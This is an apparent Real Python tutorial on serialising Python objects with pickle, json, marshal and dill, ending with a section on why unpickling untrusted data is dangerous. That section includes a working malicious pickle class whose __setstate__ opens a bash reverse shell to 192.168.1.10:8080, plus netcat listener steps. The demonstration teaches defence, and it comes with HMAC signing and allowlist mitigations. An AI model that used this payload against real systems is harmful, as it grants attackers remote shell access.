Watch Now This tutorial has a related video course created by the Real Python team. Watch it together with the written tutorial to deepen your understanding: Serializing Objects With the Python pickle Module
As a developer, you may sometimes need to send complex object hierarchies over a network or save the internal state of your objects to a disk or database for later use. To accomplish this, you can use a process called serialization, which is fully supported by the standard library thanks to the Python pickle module.
In this tutorial, you’ll learn:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are when deserializing an object from an untrusted source
Let’s get pickling!
Serialization in Python
The serialization process is a way to convert a data structure into a linear form that can be stored or transmitted over a network.
In Python, serialization allows you to take a complex object structure and transform it into a stream of bytes that can be saved to a disk or sent over a network. You may also see this process referred to as marshalling. The reverse process, which takes a stream of bytes and converts it back into a data structure, is called deserialization or unmarshalling.
Serialization can be used in a lot of different situations. One of the most common uses is saving the state of a neural network after the training phase so that you can use it later without having to redo the training.
Python offers three different modules in the standard library that allow you to serialize and deserialize objects:
- The marshal module
- The json module
- The pickle module
In addition, Python supports XML, which you can also use to serialize objects.
The marshal module is the oldest of the three listed above. It exists mainly to read and write the compiled bytecode of Python modules, or the .pyc files you get when the interpreter imports a Python module. So, even though you can use marshal to serialize some of your objects, it’s not recommended.
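As a rough illustration of why marshal is a poor general-purpose choice, the sketch below round-trips a built-in structure and then tries an instance of a custom class. The Point class is hypothetical and exists only for this example. On CPython, marshal rejects objects it doesn’t support with a ValueError:

```python
import marshal


class Point:
    """Hypothetical custom class, used only for this illustration."""

    def __init__(self, x, y):
        self.x = x
        self.y = y


# Built-in containers of simple values round-trip without trouble.
simple = {"numbers": [1, 2, 3], "label": "ok"}
restored = marshal.loads(marshal.dumps(simple))
print(restored == simple)

# Instances of user-defined classes are not supported by marshal.
try:
    marshal.dumps(Point(1, 2))
    custom_supported = True
except ValueError as error:
    custom_supported = False
    print(f"marshal refused the custom object: {error}")
```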
The json module is the newest of the three. It allows you to work with standard JSON files. JSON is a very convenient and widely used format for data exchange.
There are several reasons to choose the JSON format: It’s human readable and language independent, and it’s lighter than XML. With the json module, you can serialize and deserialize several standard Python types:
- bool
- dict
- int
- float
- list
- str
- tuple
- None
The Python pickle module is another way to serialize and deserialize objects in Python. It differs from the json module in that it serializes objects in a binary format, which means the result is not human readable. However, it’s also faster and it works with many more Python types right out of the box, including your custom-defined objects.
Note: From now on, you’ll see the terms pickling and unpickling used to refer to serializing and deserializing with the Python pickle module.
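To make the difference between the two modules concrete, here’s a minimal sketch that round-trips the same dictionary through json and pickle. The sample data is made up for this illustration. It shows that json produces text and turns the tuple into a list, while pickle produces bytes and preserves the tuple:

```python
import json
import pickle

# Sample data invented for this comparison.
data = {"name": "example", "point": (1, 2), "tags": ["a", "b"]}

# json produces human-readable text.
json_text = json.dumps(data)
json_roundtrip = json.loads(json_text)

# pickle produces binary data.
pickle_bytes = pickle.dumps(data)
pickle_roundtrip = pickle.loads(pickle_bytes)

print(type(json_text).__name__)     # str
print(type(pickle_bytes).__name__)  # bytes
print(json_roundtrip["point"])      # [1, 2]
print(pickle_roundtrip["point"])    # (1, 2)
```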
So, you have several different ways to serialize and deserialize objects in Python. But which one should you use? The short answer is that there’s no one-size-fits-all solution. It all depends on your use case.
Here are three general guidelines for deciding which approach to use:
- Don’t use the marshal module. It’s used mainly by the interpreter, and the official documentation warns that the Python maintainers may modify the format in backward-incompatible ways.
- The json module and XML are good choices if you need interoperability with different languages or a human-readable format.
- The Python pickle module is a better choice for all the remaining use cases. If you don’t need a human-readable format or a standard interoperable format, or if you need to serialize custom objects, then go with pickle.
Inside the Python pickle Module
The Python pickle module basically consists of four functions:
pickle.dump(obj, file, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.dumps(obj, protocol=None, *, fix_imports=True, buffer_callback=None)
pickle.load(file, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
pickle.loads(bytes_object, *, fix_imports=True, encoding="ASCII", errors="strict", buffers=None)
The first two functions are used during the pickling process, and the other two are used during unpickling. The only difference between dump() and dumps() is that the first writes the serialization result to an open binary file, whereas the second returns it as a bytes object.
To differentiate dumps() from dump(), it’s helpful to remember that the s at the end of the function name stands for string. In Python 3, that string is a bytes object. The same concept also applies to load() and loads(): The first one reads from a file to start the unpickling process, and the second one operates on a bytes object.
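The two pairs of functions can be compared side by side. The following is a minimal sketch in which the record dictionary and the record.pkl filename are placeholders chosen for this illustration. Note that the file has to be opened in binary mode:

```python
import os
import pickle
import tempfile

# Placeholder data for this illustration.
record = {"id": 7, "scores": [0.5, 0.75]}

# dumps() and loads() work with an in-memory bytes object.
payload = pickle.dumps(record)
restored_from_bytes = pickle.loads(payload)

# dump() and load() work with a file opened in binary mode.
with tempfile.TemporaryDirectory() as tmp_dir:
    path = os.path.join(tmp_dir, "record.pkl")
    with open(path, "wb") as file:
        pickle.dump(record, file)
    with open(path, "rb") as file:
        restored_from_file = pickle.load(file)

print(type(payload).__name__)
print(restored_from_bytes == restored_from_file == record)
```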
Consider the following example. Say you have a custom-defined class named example_class with several different attributes, each of a different type:
- a_number
- a_string
- a_dict
- a_list
- a_tuple
The example below shows how you can instantiate the class and pickle the instance to get a bytes object. After pickling the instance, you can change the value of its attributes without affecting the pickled bytes. You can then unpickle the bytes into another variable, restoring a copy of the previously pickled instance:
# pickling.py
import pickle

class example_class:
    a_number = 35
    a_string = "hey"
    a_list = [1, 2, 3]
    a_dict = {"first": "a", "second": 2, "third": [1, 2, 3]}
    a_tuple = (22, 23)

my_object = example_class()

my_pickled_object = pickle.dumps(my_object)  # Pickling the object
print(f"This is my pickled object:\n{my_pickled_object}\n")

my_object.a_dict = None

my_unpickled_object = pickle.loads(my_pickled_object)  # Unpickling the object
print(
    f"This is a_dict of the unpickled object:\n{my_unpickled_object.a_dict}\n")
In the example above, you create an instance of example_class and serialize it with pickle. This produces a single bytes object with the serialized result:
$ python pickling.py
This is my pickled object:
b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
This is a_dict of the unpickled object:
{'first': 'a', 'second': 2, 'third': [1, 2, 3]}
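The pickling process ends correctly, storing your instance in this bytes object: b'\x80\x03c__main__\nexample_class\nq\x00)\x81q\x01.'
After the pickling process ends, you modify your original object by setting the attribute a_dict to None.
Finally, you unpickle the bytes to a completely new instance. What you get is a deep copy of your original object structure from the time that the pickling process began.
Note: In this example, a_dict and the other attributes are defined on the class, so they aren’t stored in the pickled bytes, which only reference example_class by name. The unpickled instance reads them from the class itself. Attributes that you assign on the instance, for example in .__init__(), are the ones that pickle stores and restores.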
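To see the copy semantics with state that actually lives on the instance, here’s a minimal sketch. The Example class is hypothetical and assigns its attributes in .__init__() so that they end up in the instance’s __dict__ and therefore in the pickled data:

```python
import pickle


class Example:
    """Hypothetical class whose state lives on the instance."""

    def __init__(self):
        self.a_number = 35
        self.a_dict = {"first": "a", "third": [1, 2, 3]}


original = Example()
snapshot = pickle.dumps(original)

# Mutate the original after pickling, including a nested list.
original.a_number = 0
original.a_dict["third"].append(4)

# The unpickled instance reflects the state at pickling time.
restored = pickle.loads(snapshot)
print(restored.a_number)
print(restored.a_dict["third"])
print(restored is original)
```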
Protocol Formats of the Python pickle Module
As mentioned above, the pickle module is Python-specific, and the result of a pickling process can be read only by another Python program. But even if you’re working with Python, it’s important to know that the pickle module has evolved over time.
This means that if you’ve pickled an object with a specific version of Python, then you may not be able to unpickle it with an older version. The compatibility depends on the protocol version that you used for the pickling process.
There are currently six different protocols that the Python pickle module can use. The higher the protocol version, the more recent the Python interpreter needs to be for unpickling.
- Protocol version 0 was the first version. Unlike later protocols, it’s human readable.
- Protocol version 1 was the first binary format.
- Protocol version 2 was introduced in Python 2.3.
- Protocol version 3 was added in Python 3.0. It can’t be unpickled by Python 2.x.
- Protocol version 4 was added in Python 3.4. It features support for a wider range of object sizes and types and is the default protocol starting with Python 3.8.
- Protocol version 5 was added in Python 3.8. It features support for out-of-band data and improved speeds for in-band data.
Note: Newer versions of the protocol offer more features and improvements but are limited to higher versions of the interpreter. Be sure to consider this when choosing which protocol to use.
To identify the highest protocol that your interpreter supports, you can check the value of the pickle.HIGHEST_PROTOCOL attribute.
To choose a specific protocol, you need to specify the protocol version when you invoke dump() or dumps(). If you don’t specify a protocol, then your interpreter will use the default version specified in the pickle.DEFAULT_PROTOCOL attribute. You don’t need to specify a protocol for load() or loads() because the protocol version is detected automatically from the pickled data.
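As a quick way to explore the protocols on your own interpreter, the sketch below pickles the same small dictionary with every protocol that’s available and unpickles each result without naming a protocol. The sample data is arbitrary, and the sizes you see will depend on your Python version:

```python
import pickle

# Arbitrary sample data for this illustration.
data = {"a": [1, 2, 3]}

print("highest:", pickle.HIGHEST_PROTOCOL)
print("default:", pickle.DEFAULT_PROTOCOL)

# Pickle the same object once per available protocol.
payloads = {}
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
    payloads[protocol] = pickle.dumps(data, protocol=protocol)

# loads() takes no protocol argument. It detects the version itself.
roundtrips = {
    protocol: pickle.loads(payload)
    for protocol, payload in payloads.items()
}

# Show each payload's size and its first two bytes.
for protocol, payload in payloads.items():
    print(protocol, len(payload), payload[:2])
```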
Picklable and Unpicklable Types
You’ve already learned that the Python pickle module can serialize many more types than the json module. However, not everything is picklable. The list of unpicklable objects includes database connections, opened network sockets, running threads, and others.
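If you’re unsure whether an object is picklable, then one pragmatic check is to try pickling it and catch the error. The sketch below does this for a thread lock and a generator, which are two stand-ins chosen for this illustration, alongside a plain dictionary for contrast:

```python
import pickle
import threading

# Objects picked for this illustration: two tied to runtime state,
# and one plain data structure.
candidates = {
    "lock": threading.Lock(),
    "generator": (n * n for n in range(3)),
    "plain dict": {"n": 1},
}

results = {}
for name, obj in candidates.items():
    try:
        pickle.dumps(obj)
        results[name] = "picklable"
    except (TypeError, pickle.PicklingError) as error:
        results[name] = f"not picklable ({type(error).__name__})"
    print(f"{name}: {results[name]}")
```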
If you find yourself faced with an unpicklable object, then there are a couple of things that you can do. The first option is to use a third-party library such as dill.
The dill module extends the capabilities of pickle. According to the official documentation, it lets you serialize less common types like functions with yields, nested functions, lambdas, and many others.
To test this module, you can try to pickle a lambda function:
# pickling_error.py
import pickle
square = lambda x : x * x
my_pickle = pickle.dumps(square)
If you try to run this program, then you will get an exception because the Python pickle module can’t serialize a lambda function:
$ python pickling_error.py
Traceback (most recent call last):
  File "pickling_error.py", line 6, in <module>
    my_pickle = pickle.dumps(square)
_pickle.PicklingError: Can't pickle <function <lambda> at 0x10cd52cb0>: attribute lookup <lambda> on __main__ failed
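The error message hints at the reason: pickle stores functions by reference, as a module name plus a function name, and looks that name up again when unpickling. A lambda has no name that can be looked up. The following sketch contrasts the two cases, using math.sqrt as an arbitrary example of an importable function:

```python
import math
import pickle

# Importable functions are pickled by reference (module plus name),
# so unpickling returns the very same function object.
payload = pickle.dumps(math.sqrt)
same_function = pickle.loads(payload) is math.sqrt
print(same_function)

# A lambda's __name__ is "<lambda>", which can't be looked up by name.
square = lambda x: x * x

try:
    pickle.dumps(square)
    lambda_pickled = True
except (pickle.PicklingError, AttributeError) as error:
    lambda_pickled = False
    print(type(error).__name__)
```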
Now try replacing the Python pickle module with dill to see if there’s any difference:
# pickling_dill.py
import dill
square = lambda x: x * x
my_pickle = dill.dumps(square)
print(my_pickle)
If you run this code, then you’ll see that the dill module serializes the lambda without returning an error:
$ python pickling_dill.py
b'\x80\x03cdill._dill\n_create_function\nq\x00(cdill._dill\n_load_type\nq\x01X\x08\x00\x00\x00CodeTypeq\x02\x85q\x03Rq\x04(K\x01K\x00K\x01K\x02KCC\x08|\x00|\x00\x14\x00S\x00q\x05N\x85q\x06)X\x01\x00\x00\x00xq\x07\x85q\x08X\x10\x00\x00\x00pickling_dill.pyq\tX\t\x00\x00\x00squareq\nK\x04C\x00q\x0b))tq\x0cRq\rc__builtin__\n__main__\nh\nNN}q\x0eNtq\x0fRq\x10.'
Another interesting feature of dill is that it can even serialize an entire interpreter session. Here’s an example:
>>> square = lambda x : x * x
>>> a = square(35)
>>> import math
>>> b = math.sqrt(484)
>>> import dill
>>> dill.dump_session('test.pkl')
>>> exit()
In this example, you start the interpreter, import a module, and define a lambda function along with a couple of other variables. You then import the dill module and invoke dump_session() to serialize the entire session.
If everything goes okay, then you should get a test.pkl file in your current directory:
$ ls test.pkl
4 -rw-r--r--@ 1 dave staff 439 Feb 3 10:52 test.pkl
Now you can start a new instance of the interpreter and load the test.pkl file to restore your last session:
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>)])
>>> import dill
>>> dill.load_session('test.pkl')
>>> globals().items()
dict_items([('__name__', '__main__'), ('__doc__', None), ('__package__', None), ('__loader__', <class '_frozen_importlib.BuiltinImporter'>), ('__spec__', None), ('__annotations__', {}), ('__builtins__', <module 'builtins' (built-in)>), ('dill', <module 'dill' from '/usr/local/lib/python3.7/site-packages/dill/__init__.py'>), ('square', <function <lambda> at 0x10a013a70>), ('a', 1225), ('math', <module 'math' from '/usr/local/Cellar/python/3.7.5/Frameworks/Python.framework/Versions/3.7/lib/python3.7/lib-dynload/math.cpython-37m-darwin.so'>), ('b', 22.0)])
>>> a
1225
>>> b
22.0
>>> square
<function <lambda> at 0x10a013a70>
The first globals().items() statement demonstrates that the interpreter is in the initial state. This means that you need to import the dill module and call load_session() to restore your serialized interpreter session.
Note: Before you use dill instead of pickle, keep in mind that dill is not included in the standard library of the Python interpreter and is typically slower than pickle.
Even though dill lets you serialize a wider range of objects than pickle, it can’t solve every serialization problem that you may have. If you need to serialize an object that contains a database connection, for example, then you’re in for a tough time because it’s an unserializable object even for dill.
So, how can you solve this problem?
The solution in this case is to exclude the object from the serialization process and to reinitialize the connection after the object is deserialized.
You can use __getstate__() to define what should be included in the pickling process. This method allows you to specify what you want to pickle. If you don’t override __getstate__(), then the instance’s __dict__ will be used by default.
In the following example, you’ll see how you can define a class with several attributes and exclude one attribute from serialization with __getstate__():
# custom_pickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)

print(my_new_instance.__dict__)
In this example, you create an object with three attributes. Since one attribute is a lambda, the object is unpicklable with the standard pickle module.
To address this issue, you specify what to pickle with __getstate__(). You first clone the entire __dict__ of the instance to have all the attributes defined in the class, and then you manually remove the unpicklable c attribute.
If you run this example and then deserialize the object, then you’ll see that the new instance doesn’t contain the c attribute:
$ python custom_pickling.py
{'a': 35, 'b': 'test'}
But what if you wanted to do some additional initializations while unpickling, say by adding the excluded c object back to the deserialized instance? You can accomplish this with __setstate__():
# custom_unpickling.py
import pickle

class foobar:
    def __init__(self):
        self.a = 35
        self.b = "test"
        self.c = lambda x: x * x

    def __getstate__(self):
        attributes = self.__dict__.copy()
        del attributes['c']
        return attributes

    def __setstate__(self, state):
        self.__dict__ = state
        self.c = lambda x: x * x

my_foobar_instance = foobar()
my_pickle_string = pickle.dumps(my_foobar_instance)
my_new_instance = pickle.loads(my_pickle_string)
print(my_new_instance.__dict__)
By recreating the excluded c object in __setstate__(), you ensure that it appears in the __dict__ of the unpickled instance.
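The same pattern applies to the database connection scenario mentioned earlier. Here’s a minimal sketch that uses sqlite3 from the standard library. The Repository class and its db_path attribute are hypothetical names made up for this illustration. The connection is dropped in __getstate__() and reopened in __setstate__():

```python
import pickle
import sqlite3


class Repository:
    """Hypothetical class that owns an unpicklable connection."""

    def __init__(self, db_path=":memory:"):
        self.db_path = db_path
        self.connection = sqlite3.connect(db_path)

    def __getstate__(self):
        # Copy the state and leave out the live connection.
        state = self.__dict__.copy()
        del state["connection"]
        return state

    def __setstate__(self, state):
        # Restore the picklable state, then reconnect.
        # With ":memory:", this opens a new, empty database.
        self.__dict__.update(state)
        self.connection = sqlite3.connect(self.db_path)


repo = Repository()
clone = pickle.loads(pickle.dumps(repo))

# The clone has its own working connection.
result = clone.connection.execute("SELECT 1 + 1").fetchone()
print(result)  # (2,)

repo.connection.close()
clone.connection.close()
```

Storing the path rather than the connection keeps the pickled state small and lets the receiving process decide when the connection is reopened.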
Compression of Pickled Objects
Although the pickle data format is a compact binary representation of an object structure, you can still optimize your pickled data by compressing it with bzip2 or gzip.
To compress pickled data with bzip2, you can use the bz2 module provided in the standard library.
In the following example, you’ll take a string, pickle it, and then compress it using the bz2 library:
>>> import pickle
>>> import bz2
>>> my_string = """Per me si va ne la città dolente,
... per me si va ne l'etterno dolore,
... per me si va tra la perduta gente.
... Giustizia mosse il mio alto fattore:
... fecemi la divina podestate,
... la somma sapienza e 'l primo amore;
... dinanzi a me non fuor cose create
... se non etterne, e io etterno duro.
... Lasciate ogne speranza, voi ch'intrate."""
>>> pickled = pickle.dumps(my_string)
>>> compressed = bz2.compress(pickled)
>>> len(my_string)
315
>>> len(compressed)
259
When using compression, bear in mind that smaller files come at the cost of a slower process.
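To get a feel for the trade-off on your own data, you can compare the sizes that bz2 and gzip produce and confirm that the data survives the round trip. The sketch below uses a made-up list of repetitive records, which compresses well. Real-world savings depend on how redundant your data is:

```python
import bz2
import gzip
import pickle

# Made-up, highly repetitive sample data.
data = [{"id": i, "label": "sample"} for i in range(1000)]

pickled = pickle.dumps(data)
bz2_bytes = bz2.compress(pickled)
gzip_bytes = gzip.compress(pickled)

print("pickled:", len(pickled))
print("bz2:    ", len(bz2_bytes))
print("gzip:   ", len(gzip_bytes))

# Decompress first, then unpickle.
restored = pickle.loads(bz2.decompress(bz2_bytes))
print(restored == data)
```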
Security Concerns With the Python pickle Module
You now know how to use the pickle module to serialize and deserialize objects in Python. The serialization process is very convenient when you need to save your object’s state to disk or to transmit it over a network.
However, there’s one more thing you need to know about the Python pickle module: It’s not secure. Do you remember the discussion of __setstate__()? Well, that method is great for doing more initialization while unpickling, but it can also be used to execute arbitrary code during the unpickling process!
So, what can you do to reduce this risk?
Sadly, not much. The rule of thumb is to never unpickle data that comes from an untrusted source or is transmitted over an insecure network. In order to prevent man-in-the-middle attacks, it’s a good idea to use libraries such as hmac to sign the data and ensure it hasn’t been tampered with.
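One way to apply the signing idea is sketched below. It assumes that the sender and receiver share a secret key, and the SECRET_KEY value, the sign_pickle() and verify_and_load() helpers, and the layout of digest followed by payload are all choices made for this illustration. The important detail is that the signature is checked before pickle.loads() ever sees the data:

```python
import hashlib
import hmac
import pickle

# Hypothetical shared secret. Use a properly generated key in practice.
SECRET_KEY = b"replace-with-a-real-secret"
DIGEST_SIZE = hashlib.sha256().digest_size  # 32 bytes


def sign_pickle(obj):
    """Pickle obj and prepend an HMAC-SHA256 digest of the payload."""
    payload = pickle.dumps(obj)
    digest = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    return digest + payload


def verify_and_load(message):
    """Check the digest first and unpickle only if it matches."""
    digest, payload = message[:DIGEST_SIZE], message[DIGEST_SIZE:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(digest, expected):
        raise ValueError("signature mismatch, refusing to unpickle")
    return pickle.loads(payload)


message = sign_pickle({"user": "alice"})
restored = verify_and_load(message)
print(restored)

# Flip one bit in the payload to simulate tampering.
tampered = message[:-1] + bytes([message[-1] ^ 1])
try:
    verify_and_load(tampered)
    tamper_detected = False
except ValueError:
    tamper_detected = True
print(tamper_detected)
```

Signing only proves that the data came from someone who holds the key. It doesn’t make a pickle from an untrusted sender safe to load.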
The following example illustrates how unpickling a tampered pickle could expose your system to attackers, even giving them a working remote shell:
# remote.py
import pickle
import os

class foobar:
    def __init__(self):
        pass

    def __getstate__(self):
        return self.__dict__

    def __setstate__(self, state):
        # The attack is from 192.168.1.10
        # The attacker is listening on port 8080
        os.system('/bin/bash -c '
                  '"/bin/bash -i >& /dev/tcp/192.168.1.10/8080 0>&1"')

my_foobar = foobar()
my_pickle = pickle.dumps(my_foobar)
my_unpickle = pickle.loads(my_pickle)
In this example, the unpickling process executes __setstate__(), which executes a Bash command to open a remote shell to the 192.168.1.10 machine on port 8080.
Here’s how you can safely test this script on your Mac or your Linux box. First, open the terminal and use the nc command to listen for a connection to port 8080:
$ nc -l 8080
This will be the attacker terminal. If everything works, then the command will seem to hang.
Next, open another terminal on the same computer (or on any other computer on the network) and execute the Python code above for unpickling the malicious code. Be sure to change the IP address in the code to your attacking terminal’s IP address. In my example, the attacker’s IP address is 192.168.1.10.
By executing this code, the victim will expose a shell to the attacker:
$ python remote.py
If everything works, a Bash shell will appear on the attacking console. This console can now operate directly on the attacked system:
$ nc -l 8080
bash: no job control in this shell
The default interactive shell is now zsh.
To update your account to use zsh, please run `chsh -s /bin/zsh`.
For more details, please visit https://support.apple.com/kb/HT208050.
bash-3.2$
So, let me repeat this critical point once again: Do not use the pickle module to deserialize objects from untrusted sources!
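If you can’t avoid unpickling altogether, then the official pickle documentation describes one way to narrow the attack surface: subclass pickle.Unpickler and override find_class() so that only an allowlist of globals can be loaded. The sketch below follows that approach. The RestrictedUnpickler and restricted_loads() names and the contents of SAFE_BUILTINS are choices made for this illustration, and this is a mitigation, not a guarantee of safety:

```python
import builtins
import io
import pickle

# Allowlist chosen for this illustration.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Only allow a few harmless names from builtins.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Refuse everything else.
        raise pickle.UnpicklingError(
            f"global '{module}.{name}' is forbidden"
        )


def restricted_loads(data):
    """Like pickle.loads(), but with the allowlist applied."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data and allowed globals load normally.
allowed = restricted_loads(pickle.dumps([1, 2, range(15)]))
print(allowed)

# A pickle that references builtins.eval is rejected.
try:
    restricted_loads(pickle.dumps(eval))
    blocked = False
except pickle.UnpicklingError as error:
    blocked = True
    print(error)
```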
Conclusion
You now know how to use the Python pickle
module to convert an object hierarchy to a stream of bytes that can be saved to a disk or transmitted over a network. You also know that the deserialization process in Python must be used with care since unpickling something that comes from an untrusted source can be extremely dangerous.
In this tutorial, you’ve learned:
- What it means to serialize and deserialize an object
- Which modules you can use to serialize objects in Python
- Which kinds of objects can be serialized with the Python pickle module
- How to use the Python pickle module to serialize object hierarchies
- What the risks are of unpickling from an untrusted source
With this knowledge, you’re well equipped to persist your objects using the Python pickle module. As an added bonus, you’re ready to explain the dangers of deserializing malicious pickles to your friends and coworkers.